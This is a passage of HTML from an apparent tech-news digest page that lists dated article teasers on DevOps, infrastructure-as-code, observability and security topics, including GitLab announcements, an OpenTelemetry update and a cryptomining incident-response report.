        <a href="#h3-give-github-copilot-cli-real-code-intelligence-with-language-servers" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Give GitHub Copilot CLI real code intelligence with language servers
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-give-github-copilot-cli-real-code-intelligence-with-language-servers"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Install and configure LSP servers for GitHub Copilot CLI, replacing brute-force grep/decompile with real code intelligence. The post Give GitHub Copilot CLI real code intelligence with language server</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/ai-and-ml/github-copilot/give-github-copilot-cli-real-code-intelligence-with-language-servers/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-gitlab-orbit-full-code-and-lifecycle-context-in-one-query" class="group relative scroll-mt-24">
        <a href="#h3-introducing-gitlab-orbit-full-code-and-lifecycle-context-in-one-query" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing GitLab Orbit: Full code and lifecycle context, in one query
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-gitlab-orbit-full-code-and-lifecycle-context-in-one-query"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Agents are good at writing code. They&#39;re far worse at navigating the system around it: the related code, the pipelines that run it, the deployments that ship it, the work items that asked for it, and </p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/introducing-gitlab-orbit/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-flex-commit-once-reshape-your-seats-and-ai-spend" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-flex-commit-once-reshape-your-seats-and-ai-spend" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab Flex: Commit once, reshape your seats and AI spend
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-flex-commit-once-reshape-your-seats-and-ai-spend"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The agentic era made your needs harder to predict, and the way you buy software hasn&#39;t caught up. Six months out, you don&#39;t know how many seats you&#39;ll need, how much AI your teams will consume, or whi</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/introducing-gitlab-flex/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-gitlab-built-for-the-agentic-engineering-era" class="group relative scroll-mt-24">
        <a href="#h3-gitlab-built-for-the-agentic-engineering-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitLab: Built for the agentic engineering era
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-gitlab-built-for-the-agentic-engineering-era"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>GitLab Transcend, our customer event showcasing our roadmap, success stories, and industry research just wrapped. Here&#39;s what we announced and demonstrated: Next-generation source code management, a G</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 GitLab Blog</strong></p>
<p><a href="https://about.gitlab.com/blog/gitlab-transcend-announcements/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-modern-mainframe-devops-automate-cicd-for-zos-application" class="group relative scroll-mt-24">
        <a href="#h3-modern-mainframe-devops-automate-cicd-for-zos-application" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Modern Mainframe DevOps: Automate CI/CD for z/OS Application
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-modern-mainframe-devops-automate-cicd-for-zos-application"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Drive developer productivity by replacing brittle, legacy mainframe scripts with declarative, secure, and fully automated multi-tier release pipelines. | Blog</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/mainframe-devops-modern-ci-cd-for-big-iron"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform" class="group relative scroll-mt-24">
        <a href="#h3-scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Scaling automated infrastructure compliance in telecommunications using Red Hat Ansible Automation Platform
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As telecommunications (telco) mobile networks evolve from physical hardware to virtualized and containerized infrastructure, the volume of necessary network element upgrades has increased exponentiall</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/scaling-automated-infrastructure-compliance-in-telecommunications-using-red-hat-ansible-automation-platform"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-sagemaker-ai-now-supports-serverless-fine-tuning-for-nvidia-nemotron-models" class="group relative scroll-mt-24">
        <a href="#h3-sagemaker-ai-now-supports-serverless-fine-tuning-for-nvidia-nemotron-models" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 SageMaker AI now supports serverless fine-tuning for NVIDIA Nemotron models
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-sagemaker-ai-now-supports-serverless-fine-tuning-for-nvidia-nemotron-models"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon SageMaker AI now supports serverless model customization for NVIDIA Nemotron 3 Nano model using supervised fine-tuning (SFT) and reinforcement fine-tuning (RFT). This is a popular open-weight m</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/05/amazon-sagemaker-ft-nemotron-3/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-friday-five-june-12-2026" class="group relative scroll-mt-24">
        <a href="#h3-friday-five-june-12-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Friday Five — June 12, 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-friday-five-june-12-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>The AI-enabled enterprise: Why we are applying software engineering principles to business operationsRed Hat is applying the concept of Business as Code to reshape its own business operations. Serving</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Red Hat Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/friday-five-june-12-2026-red-hat"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-otel-arrow-phase-2-from-efficient-transport-to-efficient-telemetry-pipelines" class="group relative scroll-mt-24">
        <a href="#h3-otel-arrow-phase-2-from-efficient-transport-to-efficient-telemetry-pipelines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 OTel-Arrow Phase 2: From Efficient Transport to Efficient Telemetry Pipelines
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-otel-arrow-phase-2-from-efficient-transport-to-efficient-telemetry-pipelines"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Phase 1 of OTel-Arrow established OTAP, the OpenTelemetry Arrow Protocol, as an efficient transport protocol for OpenTelemetry. Apache Arrow is a language-independent, columnar in-memory format design</p>
<p><strong>📅 Jun 13, 2026</strong> • <strong>📰 OpenTelemetry Blog</strong></p>
<p><a href="https://opentelemetry.io/blog/2026/otel-arrow-phase-2/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-better-faster-less-wrong-enhancing-issue-grouping" class="group relative scroll-mt-24">
        <a href="#h3-better-faster-less-wrong-enhancing-issue-grouping" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Better, faster, less wrong: Enhancing issue grouping
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-better-faster-less-wrong-enhancing-issue-grouping"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Sentry&#39;s new AI grouping model prevents 20% more duplicate issues while cutting incorrect merges in half. Here&#39;s how we trained and deployed it.</p>
<p><strong>📅 Jun 12, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/enhancing-issue-grouping/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-introducing-the-state-of-ai-coding-2026" class="group relative scroll-mt-24">
        <a href="#h3-introducing-the-state-of-ai-coding-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Introducing the State of AI Coding 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-introducing-the-state-of-ai-coding-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>New Relic&#39;s 2026 State of AI Coding Report surveys 200 U.S. tech leaders on generative and agentic AI tools moving from personal sandboxes to production pipelines.</p>
<p><strong>📅 Jun 10, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/ai/state-of-ai-coding-2026"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-exploring-ai-integration-in-zabbix-with-gemini-and-webmcp" class="group relative scroll-mt-24">
        <a href="#h3-exploring-ai-integration-in-zabbix-with-gemini-and-webmcp" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Exploring AI Integration in Zabbix with Gemini and WebMCP
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-exploring-ai-integration-in-zabbix-with-gemini-and-webmcp"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When I first started working with Zabbix in banking and telecommunications over a decade ago, the workflow was always the same: something breaks, an alert fires, you open the dashboard, you diagnose, </p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 Zabbix Blog</strong></p>
<p><a href="https://blog.zabbix.com/exploring-ai-integration-in-zabbix-with-gemini-and-webmcp/33050/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-best-datadog-alternatives-for-modern-observability-in-2026" class="group relative scroll-mt-24">
        <a href="#h3-best-datadog-alternatives-for-modern-observability-in-2026" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Best Datadog Alternatives for Modern Observability in 2026
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-best-datadog-alternatives-for-modern-observability-in-2026"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Discover the best Datadog alternatives to improve observability, reduce costs, and unify telemetry for your engineering team’s reliability and efficiency.</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/datadog-alternatives"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-logs-vs-metrics-whats-the-difference-in-observability" class="group relative scroll-mt-24">
        <a href="#h3-logs-vs-metrics-whats-the-difference-in-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Logs vs Metrics: What’s the Difference in Observability?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-logs-vs-metrics-whats-the-difference-in-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Understand when to use logs vs metrics for effective monitoring and debugging. Learn how a unified approach improves incident response and system insights.</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/log/logs-vs-metrics"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-open-source-observability-tools-setup-and-trade-offs" class="group relative scroll-mt-24">
        <a href="#h3-open-source-observability-tools-setup-and-trade-offs" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Open Source Observability: Tools, Setup, and Trade-offs
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-open-source-observability-tools-setup-and-trade-offs"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Learn how to build effective open source observability that improves system reliability and reduces complexity with proven tools and strategies.</p>
<p><strong>📅 Jun 9, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/kubernetes-observability"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-security" class="group relative scroll-mt-24">
        <a href="#h2-security" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔐 Security
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-security"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="group relative scroll-mt-24">
        <a href="#h3-threats-making-wavs-incident-response-to-a-cryptomining-attack" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Threats Making WAVs - Incident Response to a Cryptomining Attack
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-threats-making-wavs-incident-response-to-a-cryptomining-attack"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Guardicore security researchers describe and uncover a full analysis of a cryptomining attack, which hid a cryptominer inside WAV files. The report includes the full attack vectors, from detection, in</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 Linode Blog</strong></p>
<p><a href="https://www.akamai.com/blog/security/threats-making-wavs-incident-reponse-cryptomining-attack"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-respect-and-trust-as-devops-engineering-disciplines" class="group relative scroll-mt-24">
        <a href="#h3-respect-and-trust-as-devops-engineering-disciplines" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Respect and Trust as DevOps Engineering Disciplines
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-respect-and-trust-as-devops-engineering-disciplines"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Respect and trust are DevOps engineering disciplines. They shape flow, quality, security, reliability, and adaptation.</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 DevOps.com</strong></p>
<p><a href="https://devops.com/respect-and-trust-as-devops-engineering-disciplines/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-opinion-the-anthropic-dispute-is-not-really-about-anthropic-its-about-trust" class="group relative scroll-mt-24">
        <a href="#h3-opinion-the-anthropic-dispute-is-not-really-about-anthropic-its-about-trust" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Opinion: The Anthropic Dispute Is Not Really About Anthropic. It’s About Trust.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-opinion-the-anthropic-dispute-is-not-really-about-anthropic-its-about-trust"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When the US government effectively forced Anthropic to suspend access to some of its newest AI models over security concerns (Fable 5, Mythos 5), much of the debate immediately split into familiar cam</p>
<p><strong>📅 Jun 15, 2026</strong> • <strong>📰 JetBrains Blog</strong></p>
<p><a href="https://blog.jetbrains.com/qodana/2026/06/anthropic-suspension/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-the-government-just-banned-an-ai-model-an-engineers-perspective" class="group relative scroll-mt-24">
        <a href="#h3-the-government-just-banned-an-ai-model-an-engineers-perspective" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 The Government Just Banned an AI Model. An Engineer's Perspective.
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-the-government-just-banned-an-ai-model-an-engineers-perspective"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
